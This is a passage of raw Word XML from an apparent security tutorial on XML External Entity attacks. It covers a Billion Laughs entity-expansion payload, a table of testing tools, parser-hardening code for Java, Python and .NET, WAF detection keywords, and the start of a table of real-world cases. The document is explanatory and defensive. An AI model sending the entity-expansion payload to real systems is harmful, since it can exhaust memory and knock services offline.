        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F988AB" w14:textId="147819D8" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>Billion Laughs DoS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E6AE4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 xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lolz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A779906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 xml:space="preserve"> &lt;!ENTITY a "lol"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936601C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 xml:space="preserve"> &lt;!ENTITY b "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611DF58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 xml:space="preserve"> &lt;!ENTITY c "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2369F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 xml:space="preserve"> &lt;!ENTITY d "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE62AC9" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C772218" w14:textId="22041D44" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lolz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;&amp;d;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lolz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E376B8B" w14:textId="4F57415A" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>Testing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6271"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="6FFFF162" w14:textId="77777777" w:rsidTr="00F71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D3330" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4101755B" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="5267D880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334A" w14:textId="462AB231" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A86CEF" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Intercept XML request → insert entity payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="45305699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991DF" w14:textId="6F02D1D2" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> XXEinjector.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8DFD04" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Automated XXE testing tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="1362D1A8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04BF" w14:textId="5A386531" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> SOAPUI / Postman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72FDF311" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Test XML/SOAP APIs manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="6556EFD4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E4E2" w14:textId="408EE50A" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> XML Linter Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36869D8D" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Observe if parser resolves entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="6AC0392A" w14:textId="77777777" w:rsidTr="00F71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8E67" w14:textId="44F57B1D" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> DNS Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ED2DEF5" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Use Burp Collaborator or dnslog.cn to detect OOB callbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20BDCF4B" w14:textId="14450930" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FBCF1" w14:textId="17A27290" w:rsidR="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F71DB1" w:rsidRPr="00F71DB1">
        <w:t>Disable External Entity Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AA4CB5" w14:textId="63ABB29D" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JAVA:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>factory.setFeature</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("http://apache.org/xml/features/disallow-doctype-decl", true</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20D04B06" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00F71DB1" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAE8856" w14:textId="5C5FF3BE" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etree.XMLParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>resolve_entities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFC89B" w14:textId="77777777" w:rsidR="00927497" w:rsidRDefault="00927497" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5DD3D0" w14:textId="3D5DCF51" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.Net:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053251C1" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XmlReaderSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XmlReaderSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0739B4A6" w14:textId="767715F4" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>settings.DtdProcessing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DtdProcessing.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Prohibit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F5CAD05" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63493D31" w14:textId="7FAAE58C" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:lastRenderedPageBreak/>
        <w:t>Ensure DOCTYPE and SYSTEM are disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A510AB2" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>2. Avoid Accepting XML When Not Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214255C" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve">Prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve"> or other safer formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9F3F7" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve">Reject XML uploads unless </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00927497">
        <w:t>absolutely necessary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0404BC9C" w14:textId="07E402FB" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>3. Input Validation &amp; Schema Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C469E3" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML Schema (XSD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve"> to define allowed structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F12AA" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>Reject unknown or unexpected tags/entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3386B4" w14:textId="2EBA88B0" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>4. Patch XML Parsers and Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC375B1" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>Many XXE issues exist in older libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186DA07" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>Upgrade libraries that support secure parsing by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD9A87" w14:textId="10240359" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>5. WAF or DLP Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450E098B" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>Detect payloads with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4690E938" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FED60" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55524228" w14:textId="77777777" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>ENTITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2B2B9" w14:textId="249E41AA" w:rsidR="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00927497">
        <w:t>Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AE3F4" w14:textId="0C1BBCF5" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve">XXE vulnerabilities stem from </w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusting unvalidated XML content</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t>, especially when external entities are resolved.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F27FC28" w14:textId="511B5520" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:r w:rsidRPr="00927497">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve">heck for </w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file reads, SSRF, OOB callbacks, and DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve"> while performing XXE assessments.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C014F64" w14:textId="269AF3DD" w:rsidR="00927497" w:rsidRPr="00927497" w:rsidRDefault="00927497" w:rsidP="00927497">
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve"> “Mitigation is about </w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>securely configuring the XML parser</w:t>
      </w:r>
      <w:r w:rsidRPr="00927497">
        <w:t xml:space="preserve"> — not about escaping input.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823715A" w14:textId="19F40E3F" w:rsidR="00927497" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E51B4A">
        <w:t>Real-World XXE Cases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3673"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w14:paraId="5A84F250" w14:textId="77777777" w:rsidTr="00E51B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FCD31" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Company</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FFF91B1" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w14:paraId="74FE74B6" w14:textId="77777777" w:rsidTr="00E51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DE0D" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Dropbox (Bug Bounty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E635D48" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>XXE via file preview API</w:t>
            </w:r>
          </w:p>
        </w:tc>
